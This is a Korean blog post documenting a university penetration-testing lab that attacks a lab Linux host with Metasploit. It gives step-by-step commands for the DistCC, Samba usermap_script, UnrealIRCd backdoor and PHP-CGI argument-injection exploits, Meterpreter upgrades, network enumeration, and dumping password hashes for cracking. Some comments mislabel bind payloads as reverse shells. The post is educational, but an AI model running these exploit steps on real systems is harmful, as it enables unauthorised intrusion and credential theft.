[๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ

2025. 2. 6. 21:27ยท๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น
๋ชฉ์ฐจ
  1. 1๏ธโƒฃ ๋Œ€์ƒ ์‹œ์Šคํ…œ ์ •๋ณด ์ˆ˜์ง‘
  2. 2๏ธโƒฃ DistCC ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  3. ๐Ÿ”น 1. Metasploit ์‹คํ–‰ ํ›„ ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  4. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  5. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  6. ๐Ÿ”น 4. CMD ๊ธฐ๋ฐ˜ ์…ธ์„ Meterpreter๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ
  7. ๐Ÿ”น 5. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜
  8. 3๏ธโƒฃ ์‚ผ๋ฐ” ์„œ๋น„์Šค์˜ ๊ตฌ์กฐ์  ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  9. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  10. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  11. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  12. ๐Ÿ”น 4. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜
  13. ๐Ÿ”น 5. ๋„คํŠธ์›Œํฌ ์ •๋ณด ์ˆ˜์ง‘(enum_network)
  14. ๐Ÿ”น 6. ๋ณด์•ˆ ์„ค์ • ์ •๋ณด ์ˆ˜์ง‘ (enum_protections)
  15. ๐Ÿ”น 7. hashdump ๋ชจ๋“ˆ ์‚ฌ์šฉ
  16. 4๏ธโƒฃ UnrealIRCd ๋ฐฑ๋„์–ด๋ฅผ ์ด์šฉํ•œ ์นจํˆฌ
  17. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  18. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  19. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  20. ๐Ÿ”น 4. ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ •๋ณด ์ถ”์ถœ (WhatWeb)
  21. 4๏ธโƒฃ php 5.4.2 ๋ฏธ๋งŒ ๋ฒ„์ „์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  22. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  23. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  24. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
728x90

! ์ด ํฌ์ŠคํŠธ์˜ ๋‚ด์šฉ์€ 2019๋…„ ์ „๊ณต ๊ฐ•์˜์—์„œ ๋‹ค๋ฃฌ ๋ฆฌ๋ˆ…์Šค ๋ณด์•ˆ ์‹ค์Šต์˜ ๊ธฐ๋ก์šฉ์ด๋ฉฐ, ์ด๋Š” ํ•™์Šต ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

! ์–ด๋– ํ•œ ๊ฒฝ์šฐ์—๋„ ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์•…์šฉํ•˜๊ฑฐ๋‚˜ ๋ถˆ๋ฒ•์ ์ธ ํ™œ๋™์— ์‚ฌ์šฉํ•ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค.

 

! ๋ชจ์˜ ํ•ดํ‚น๊ณผ ๊ด€๋ จ๋œ ์‹ค์Šต์€ ํ•ฉ๋ฒ•์ ์ธ ํ™˜๊ฒฝ์—์„œ๋งŒ ์ˆ˜ํ–‰๋˜์–ด์•ผ ํ•˜๋ฉฐ, ๋ฌด๋‹จ์œผ๋กœ ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๋Š” ๋“ฑ์˜ ํ–‰์œ„๋Š” ๋ฒ•์ ์ธ ๋ฌธ์ œ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์—๋Š” ํ•ญ์ƒ ์œค๋ฆฌ์ ์ธ ์ฑ…์ž„์„ ๊ฐ–๊ณ  ํ–‰๋™ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

1๏ธโƒฃ ๋Œ€์ƒ ์‹œ์Šคํ…œ ์ •๋ณด ์ˆ˜์ง‘

db_nmap -sT -sV -O 192.168.255.148


2๏ธโƒฃ DistCC ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ

๐Ÿ”น 1. Metasploit ์‹คํ–‰ ํ›„ ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •

msfconsole
use exploit/unix/misc/distcc_exec

 

๐Ÿ“Œ Metasploit์˜ distcc_exec ๋ชจ๋“ˆ์„ ์ด์šฉํ•ด ์ทจ์•ฝํ•œ ๋ฆฌ๋ˆ…์Šค ์‹œ์Šคํ…œ์„ ํ•ดํ‚น

  • DistCC = ์—ฌ๋Ÿฌ ๋Œ€์˜ ์ปดํ“จํ„ฐ์—์„œ ์ฝ”๋“œ๋ฅผ ๋น ๋ฅด๊ฒŒ ์ปดํŒŒ์ผํ•˜๊ธฐ ์œ„ํ•œ ์‹œ์Šคํ…œ
  • ๋ณด์•ˆ ์ธ์ฆ ์—†์ด ์›๊ฒฉ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์ ์ด ์žˆ์–ด ํ•ดํ‚น์— ์•…์šฉ๋  ์ˆ˜ ์žˆ์Œ

โœ… DistCC ํŠน์ง•

  • ๊ธฐ๋ณธ์ ์œผ๋กœ TCP 3632๋ฒˆ ํฌํŠธ์—์„œ ์‹คํ–‰
  • ์ธ์ฆ ์—†์ด ์™ธ๋ถ€ ๋ช…๋ น ์‹คํ–‰ ๊ฐ€๋Šฅ
  • ๋Œ€๋ถ€๋ถ„์˜ ๋ฐฐํฌํŒ์—์„œ root ๊ถŒํ•œ์ด ์•„๋‹Œ ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž ๊ถŒํ•œ์œผ๋กœ ์‹คํ–‰๋จ

๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •

set PAYLOAD cmd/unix/bind_ruby # bind_ruby ๊ธฐ๋ฐ˜ ๋ฆฌ๋ฒ„์Šค ์…ธ ์‚ฌ์šฉ
set RHOST 192.168.255.148 # ๋Œ€์ƒ IP ์„ค์ •
  • ๊ณต๊ฒฉ ๋Œ€์ƒ์ด ๊ณต๊ฒฉ์ž์˜ IP(LHOST)๋กœ ์—ฐ๊ฒฐ์„ ์‹œ๋„ํ•˜๋„๋ก ์„ค์ •
  • cmd/unix/reverse_netcat โ†’ ๋Œ€์ƒ ์‹œ์Šคํ…œ์— Netcat์„ ์ด์šฉํ•ด ๊ณต๊ฒฉ์ž์—๊ฒŒ ์—ฐ๊ฒฐ 

๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰

exploit
  • ๊ณต๊ฒฉ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ์ž์˜ 4444๋ฒˆ ํฌํŠธ๋กœ ์—ฐ๊ฒฐ ์„ฑ๊ณต
  • ์›๊ฒฉ ๋Œ€์ƒ์—์„œ ์…ธ์ด ์‹คํ–‰๋จ


๐Ÿ”น 4. CMD ๊ธฐ๋ฐ˜ ์…ธ์„ Meterpreter๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ

Metaslpoit์˜ ๊ธฐ๋ณธ cmd/unix/reverse_netcat ํŽ˜์ด๋กœ๋“œ๋Š” ๊ธฐ๋Šฅ์ด ์ œํ•œ์ ์ด๋ฏ€๋กœ,

CMD ๊ธฐ๋ฐ˜ ์…ธ์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜ํ•œ ํ›„ Meterpreter๋กœ ๋ณ€ํ™˜ํ•˜์—ฌ ์ง„ํ–‰

 

๐Ÿ“Œ ํ˜„์žฌ ์…ธ์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ๋ณด๋‚ด๊ธฐ

  • distcc_exec ์ต์Šคํ”Œ๋กœ์ž‡์œผ๋กœ ํš๋“ํ•œ CMD ์…ธ์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ด๋™
  • Ctrl + Z ํ‚ค๋ฅผ ๋ˆŒ๋Ÿฌ ํ˜„์žฌ ์„ธ์…˜์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜
Ctrl + Z

  • Metasploit ํ”„๋กฌํ”„ํŠธ์—์„œ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜๋๋Š”์ง€ ํ™•์ธ
sessions -l
  • ํ˜„์žฌ ์„ธ์…˜ ID ํ™•์ธ


๐Ÿ“Œ Meterpreter ๋ณ€ํ™˜

  • Shell_to_merterpreter ๋ชจ๋“ˆ ์‹คํ–‰
  • ํ˜„์žฌ ํ™œ์„ฑํ™”๋œ CMD ์…ธ์„ Meterpreter๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๋ชจ๋“ˆ ์‚ฌ์šฉ
use post/multi/manage/shell_to_meterpreter
  • ์˜ต์…˜ ์„ค์ • (set ๋ช…๋ น์–ด)
  • SESSION 1 โ†’ ๊ธฐ์กด CMD ์…ธ์„ ๋ณ€ํ™˜ํ•  ์„ธ์…˜ ์„ ํƒ
set SESSION 1
exploit
  • exploit ํ›„ Meterpreter ์„ธ์…˜์ด ์„ฑ๊ณต์ ์œผ๋กœ ์—ด๋ ธ์Œ

  • ํ˜„์žฌ ํ™œ์„ฑํ™”๋œ Meterpreter ์„ธ์…˜ ํ™•์ธ
sessions

  • Meterpreter ์„ธ์…˜(ID 2๋ฒˆ)์ด ์„ฑ๊ณต์ ์œผ๋กœ ์—ด๋ฆผ

๐Ÿ”น 5. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜

  • Meterpreter ์‹คํ–‰
sessions 2


3๏ธโƒฃ ์‚ผ๋ฐ” ์„œ๋น„์Šค์˜ ๊ตฌ์กฐ์  ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ

Samba๋Š” Linux/Unix ํ™˜๊ฒฝ์—์„œ Windows์™€ ํŒŒ์ผ ๊ณต์œ ๋ฅผ ์ œ๊ณตํ•˜๋Š” ์„œ๋น„์Šค๋‹ค.

์ด ์„œ๋น„์Šค์—์„œ ๋ฐœ์ƒํ•˜๋Š” ์ทจ์•ฝ์ ์„ ์•…์šฉํ•˜๋ฉด ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰(RCE)์„ ํ†ตํ•ด ์‹œ์Šคํ…œ์„ ์žฅ์•… ๊ฐ€๋Šฅํ•˜๋‹ค.

 

๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •

use exploit/multi/samba/usermap_script

๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •

set PAYLOAD cmd/unix/bind_ruby # bind_ruby ๊ธฐ๋ฐ˜ ๋ฆฌ๋ฒ„์Šค ์…ธ ์‚ฌ์šฉ
set RHOST 192.168.255.148 # ๋Œ€์ƒ IP ์„ค์ •

๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰

exploit
  • ๊ณต๊ฒฉ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ์ž์˜ 4444๋ฒˆ ํฌํŠธ๋กœ ์—ฐ๊ฒฐ ์„ฑ๊ณต
  • ์›๊ฒฉ ๋Œ€์ƒ์—์„œ ์…ธ์ด ์‹คํ–‰๋จ

๐Ÿ”น 4. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜

use multi/manage/shell_to_merterprter
set session 2
exploit

sessions 3

 


๐Ÿ”น 5. ๋„คํŠธ์›Œํฌ ์ •๋ณด ์ˆ˜์ง‘(enum_network)

enum_network๋Š” ์นจํˆฌํ•œ ์‹œ์Šคํ…œ์˜ ๋„คํŠธ์›Œํฌ ์ธํ„ฐํŽ˜์ด์Šค, ์—ฐ๊ฒฐ๋œ ๋„คํŠธ์›Œํฌ, ๋ผ์šฐํŒ… ํ…Œ์ด๋ธ” ์ •๋ณด๋ฅผ ์ˆ˜์ง‘ํ•˜๋Š” ๋ชจ๋“ˆ์ด๋‹ค.

์ด๋ฅผ ํ†ตํ•ด ๋‚ด๋ถ€ ๋„คํŠธ์›Œํฌ ๊ตฌ์กฐ๋ฅผ ํŒŒ์•…ํ•˜๊ณ  ์ถ”๊ฐ€์ ์ธ ๊ณต๊ฒฉ ๋Œ€์ƒ์„ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.

  • ์‹คํ–‰ ๋ฐฉ๋ฒ•
run post/linux/gather/enum_network
  • ์‹คํ–‰ ๊ฒฐ๊ณผ

  • ๋Œ€์ƒ ์‹œ์Šคํ…œ์˜ IP ์ฃผ์†Œ, MAC ์ฃผ์†Œ, ๊ฒŒ์ดํŠธ์›จ์ด ์ •๋ณด ํ™•์ธ
  • ํ˜„์žฌ ํ™œ์„ฑํ™”๋œ ๋„คํŠธ์›Œํฌ ์—ฐ๊ฒฐ(ESTABLISHED ์ƒํƒœ์˜ ์„ธ์…˜ ํฌํ•จ) ํ™•์ธ
  • ๋ผ์šฐํŒ… ํ…Œ์ด๋ธ” ํ™•์ธ โ†’ ์ถ”๊ฐ€์ ์ธ ๋„คํŠธ์›Œํฌ ํƒ์ƒ‰ ๊ฐ€๋Šฅ

๐Ÿ”น 6. ๋ณด์•ˆ ์„ค์ • ์ •๋ณด ์ˆ˜์ง‘ (enum_protections)

enum_protections์€ ๋Œ€์ƒ ์‹œ์Šคํ…œ์˜ ๋ณด์•ˆ ๋ฉ”์ปค๋‹ˆ์ฆ˜(ASLR, SELinux, ๋ฐฉํ™”๋ฒฝ ์„ค์ • ๋“ฑ)์„ ๋ถ„์„ํ•˜๋Š” ๊ธฐ๋Šฅ์„ ํ•œ๋‹ค

์ด๋ฅผ ํ†ตํ•ด ๊ถŒํ•œ ์ƒ์Šน ๊ณต๊ฒฉ ๊ฐ€๋Šฅ์„ฑ์„ ํ‰๊ฐ€ํ•  ์ˆ˜ ์žˆ๋‹ค.

  • ์‹คํ–‰ ๋ฐฉ๋ฒ•
run post/linux/gather/enum_protections
  • ์‹คํ–‰ ๊ฒฐ๊ณผ

  • ASLR(๋ฉ”๋ชจ๋ฆฌ ๋žœ๋คํ™”) ํ™œ์„ฑ ์—ฌ๋ถ€ ํ™•์ธ โ†’ ๋ฉ”๋ชจ๋ฆฌ ์ต์Šคํ”Œ๋กœ์ž‡ ๊ฐ€๋Šฅ์„ฑ ๋ถ„์„

๐Ÿ”น 7. hashdump ๋ชจ๋“ˆ ์‚ฌ์šฉ

hashdump๋Š” Linux ์‹œ์Šคํ…œ์˜ ์‚ฌ์šฉ์ž ๊ณ„์ • ์ •๋ณด ๋ฐ ์•”ํ˜ธ ํ•ด์‹œ๋ฅผ ์ถ”์ถœํ•˜๋Š” ๋ชจ๋“ˆ์ด๋‹ค.

์ถ”์ถœํ•œ ํ•ด์‹œ๋Š” ํŒจ์Šค์›Œ๋“œ ํฌ๋ž˜ํ‚น ๋„๊ตฌ(John the Ripper, Hashcat)๋กœ ๋ถ„์„ํ•  ์ˆ˜ ์žˆ๋‹ค.

  • ์‹คํ–‰ ๋ฐฉ๋ฒ•
run post/linux/gather/hashdump
  • ์‹คํ–‰ ๊ฒฐ๊ณผ

  • Linux ์‚ฌ์šฉ์ž ๊ณ„์ •๊ณผ ์•”ํ˜ธ ํ•ด์‹œ(SHA-512) ์ถ”์ถœ ์„ฑ๊ณต!
  • Hashcat์ด๋‚˜ John the Ripper๋ฅผ ์‚ฌ์šฉํ•ด ํฌ๋ž˜ํ‚น ๊ฐ€๋Šฅ

4๏ธโƒฃ UnrealIRCd ๋ฐฑ๋„์–ด๋ฅผ ์ด์šฉํ•œ ์นจํˆฌ

UnrealIRCd 3.2.8.1 ๋ฒ„์ „์—๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ ๋ฐฑ๋„์–ด๊ฐ€ ๋‚ด์žฅ๋˜์–ด ์žˆ์–ด์„œ, ์ด๋ฅผ ์ด์šฉํ•ด ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰์„ ํ•  ์ˆ˜ ์žˆ๋‹ค.

Metasploit์— ์žˆ๋Š” unreal_ircd_3281_backdoor ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜๋ฉด ์‰ฝ๊ฒŒ ๊ณต๊ฒฉํ•  ์ˆ˜ ์žˆ๋‹ค.

๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •

use exploit/unix/irc/unreal_ircd_3281_backdoor

๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •

set PAYLOAD cmd/unix/bind_ruby # bind_ruby ๊ธฐ๋ฐ˜ ๋ฆฌ๋ฒ„์Šค ์…ธ ์‚ฌ์šฉ
set RHOSTS 192.168.255.148 # ๋Œ€์ƒ IP ์„ค์ •

๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰

exploit
  • ๊ณต๊ฒฉ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ์ž์˜ 4444๋ฒˆ ํฌํŠธ๋กœ ์—ฐ๊ฒฐ ์„ฑ๊ณต
  • ์›๊ฒฉ ๋Œ€์ƒ์—์„œ ์…ธ์ด ์‹คํ–‰๋จ


๐Ÿ”น 4. ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ •๋ณด ์ถ”์ถœ (WhatWeb)

whatweb์€ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ •๋ณด๋ฅผ ์ž๋™์œผ๋กœ ์ถ”์ถœํ•˜๋Š” ๋„๊ตฌ๋กœ, ์›น ์„œ๋ฒ„๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” ์†Œํ”„ํŠธ์›จ์–ด์™€ ๊ด€๋ จ๋œ ์ค‘์š”ํ•œ ์ •๋ณด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. 

์ด ๋„๊ตฌ๋Š” ์„œ๋ฒ„์—์„œ ์‚ฌ์šฉํ•˜ ์›น ์„œ๋ฒ„ ์†Œํ”„ํŠธ์›จ์–ด, CMS, ํ”Œ๋Ÿฌ๊ทธ์ธ, ํ”„๋ ˆ์ž„์›Œํฌ ๋“ฑ์„ ์‹๋ณ„ ํ•  ์ˆ˜ ์žˆ๋‹ค.

์ด๋ฅผ ํ†ตํ•ด ์„œ๋ฒ„์— ํƒ‘์žฌ๋œ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๋ฒ„์ „, ์ทจ์•ฝ์ , ๊ณต๊ฒฉ ๋Œ€์ƒ ๋“ฑ์„ ํŒŒ์•…ํ•  ์ˆ˜ ์žˆ๋‹ค.

  • ์‹คํ–‰ ๋ฐฉ๋ฒ•
whatweb http://192.168.255.148
  • ์‹คํ–‰ ๊ฒฐ๊ณผ

  • ์›น ์„œ๋ฒ„: Apache 2.2.8 (Ubuntu)
  • PHP ๋ฒ„์ „: PHP 5.2.4-2 ubuntu5.10 โ†’ ํ›„์† ๊ณต๊ฒฉ 4๏ธโƒฃ

4๏ธโƒฃ php 5.4.2 ๋ฏธ๋งŒ ๋ฒ„์ „์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ

Whatweb์„ ํ†ตํ•ด ํ™•์ธ๋œ PHP 5.2.4 ๋ฒ„์ „์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ๋ฐฉ๋ฒ•์ด๋‹ค.

php_cgi_arg_injection ๋ชจ๋“ˆ์€ PHP CGI์—์„œ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” Argument Injection์„ ์•…์šฉํ•˜๋Š” ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•œ๋‹ค.

์ด ์ทจ์•ฝ์ ์€ PHP CGI๊ฐ€ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ์ œ๋Œ€๋กœ ๊ฒ€์ฆํ•˜์ง€ ์•Š๊ฑฐ๋‚˜ ํ•„ํ„ฐ๋งํ•˜์ง€ ์•Š์•„์„œ ๋ฐœ์ƒํ•œ๋‹ค.

์ด๋•Œ ๊ณต๊ฒฉ์ž๋Š” ์ด๋ฅผ ์ด์šฉํ•ด ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰์„ ์œ ๋„ํ•  ์ˆ˜์žˆ๋‹ค.

๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •

use exploit/multi/http/php_cgi_arg_injection

 

๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •

set PAYLOAD php/bind_php # Meterpreter ๋ฆฌ๋ฒ„์Šค ์…ธ ์„ค์ •
set RHOST 192.168.255.148 # ๋Œ€์ƒ IP ์„ค์ •

 

๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰

exploit
  • ๊ณต๊ฒฉ ์‹คํ–‰ ํ›„ ๊ณต๊ฒฉ์ž์˜ 4444๋ฒˆ ํฌํŠธ๋กœ ์—ฐ๊ฒฐ ์„ฑ๊ณต
  • ์›๊ฒฉ ๋Œ€์ƒ์—์„œ ์…ธ์ด ์‹คํ–‰๋จ

 


 

728x90

'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด > ๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ  (0) 2025.02.10
[๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ  (1) 2024.06.03
[๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต  (1) 2024.06.03
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8 ์žฌ๋ถ€ํŒ… ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹คํ–‰  (1) 2024.03.05
  1. 1๏ธโƒฃ ๋Œ€์ƒ ์‹œ์Šคํ…œ ์ •๋ณด ์ˆ˜์ง‘
  2. 2๏ธโƒฃ DistCC ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  3. ๐Ÿ”น 1. Metasploit ์‹คํ–‰ ํ›„ ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  4. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  5. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  6. ๐Ÿ”น 4. CMD ๊ธฐ๋ฐ˜ ์…ธ์„ Meterpreter๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ
  7. ๐Ÿ”น 5. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜
  8. 3๏ธโƒฃ ์‚ผ๋ฐ” ์„œ๋น„์Šค์˜ ๊ตฌ์กฐ์  ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  9. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  10. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  11. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  12. ๐Ÿ”น 4. Meterpreter ์„ธ์…˜์œผ๋กœ ์ „ํ™˜
  13. ๐Ÿ”น 5. ๋„คํŠธ์›Œํฌ ์ •๋ณด ์ˆ˜์ง‘(enum_network)
  14. ๐Ÿ”น 6. ๋ณด์•ˆ ์„ค์ • ์ •๋ณด ์ˆ˜์ง‘ (enum_protections)
  15. ๐Ÿ”น 7. hashdump ๋ชจ๋“ˆ ์‚ฌ์šฉ
  16. 4๏ธโƒฃ UnrealIRCd ๋ฐฑ๋„์–ด๋ฅผ ์ด์šฉํ•œ ์นจํˆฌ
  17. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  18. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  19. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
  20. ๐Ÿ”น 4. ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ •๋ณด ์ถ”์ถœ (WhatWeb)
  21. 4๏ธโƒฃ php 5.4.2 ๋ฏธ๋งŒ ๋ฒ„์ „์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์นจํˆฌ
  22. ๐Ÿ”น 1. ์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ ์„ค์ •
  23. ๐Ÿ”น 2. ํ•„์ˆ˜ ์˜ต์…˜ ์„ค์ •
  24. ๐Ÿ”น 3. ๊ณต๊ฒฉ ์‹คํ–‰
'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ
  • [๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ
  • [๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
  • [๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต
WISHee
WISHee
IT์™€ ๋ณด์•ˆ์— ๋Œ€ํ•œ ๊ณต๋ถ€ ๊ธฐ๋ก์„ ์ฐจ๊ณก์ฐจ๊ณก ์Œ“์•„๊ฐ€๋Š” ๊ธฐ์ˆ  ๋ธ”๋กœ๊ทธ ๐Ÿ›ก๏ธ๐Ÿ’ป
  • WISHee
    DevwithWish
    WISHee
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๐ŸŒณ ROOT (128)
      • โ›“๏ธ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ (10)
        • ๊ธฐ๋ณธ ๊ฐœ๋… (9)
        • ํŒจํ‚ท ๋ถ„์„ (1)
        • ์นจ์ž… ํƒ์ง€ ๋ฐ ๋ฐฉ์ง€ (0)
      • โš™๏ธ ์‹œ์Šคํ…œ ๋ณด์•ˆ (0)
        • ์šด์˜์ฒด์ œ ๋ณด์•ˆ (0)
        • ์ทจ์•ฝ์  ๋ถ„์„ (0)
        • ๋กœ๊ทธ ๋ถ„์„ (0)
      • ๐ŸŒ ์›น ๋ณด์•ˆ (1)
        • OWASP TOP 10 (1)
        • ์›น ์„œ๋ฒ„ ๋ณด์•ˆ (0)
        • ์›น ์ทจ์•ฝ์  ๋ถ„์„ (0)
      • โ˜๏ธ ํด๋ผ์šฐ๋“œ ๋ณด์•ˆ (3)
        • AWS (3)
      • ๐Ÿ” ์•”ํ˜ธํ™” & ์ธ์ฆ (3)
        • ์•”ํ˜ธํ™” ๊ฐœ๋… (2)
        • TLS,SSL (0)
        • ์ธ์ฆ & ์ ‘๊ทผ์ œ์–ด (1)
      • ๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด (30)
        • ๋ณด์•ˆ ๊ด€์ œ (14)
